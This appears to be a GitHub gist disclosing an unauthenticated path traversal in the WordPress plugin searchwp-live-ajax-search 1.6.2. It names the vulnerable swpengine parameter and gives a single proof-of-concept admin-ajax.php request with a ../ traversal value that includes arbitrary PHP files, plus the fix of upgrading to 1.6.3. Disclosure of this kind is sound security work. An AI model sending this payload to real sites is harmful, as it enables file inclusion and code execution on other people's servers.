Skip to content

Instantly share code, notes, and snippets.

@Xib3rR4dAr

Xib3rR4dAr/WP_searchwp-live-ajax-search_v1.6.2_unauth_path_traversal.md Secret

Created September 9, 2022 21:26
Show Gist options
  • Save Xib3rR4dAr/8f508e2fbbb05aa8704de1eba4e41422 to your computer and use it in GitHub Desktop.
Save Xib3rR4dAr/8f508e2fbbb05aa8704de1eba4e41422 to your computer and use it in GitHub Desktop.
Download ZIP
WP plugin searchwp-live-ajax-search >= 1.6.2 unauthenticated path traversal
Raw
WP_searchwp-live-ajax-search_v1.6.2_unauth_path_traversal.md

Plugin Slug: searchwp-live-ajax-search
Vulnerability: Unauthenticated path traversal for PHP files.
Vulnerable File: includes/class-client.php
Exploit Author: Muhammad Zeeshan (Xib3rR4dAr)

Description:

Parameter swpengine in includes/class-client.php is not sanitized properly, leading to unauthenticated path traversal. Exploiting path traversal, it is possible to inlcude and execute PHP files from arbitrary paths. File will execute even if PHP file is not allowed to be accessed directly.

PoC:

Following will include file named phpinfo.php which is present in arbitrary path.

https://example.com/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=&swpengine=aaaaaaa/../../asd/phpinfo

Fix:

Update plugin to version 1.6.3, or newer.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment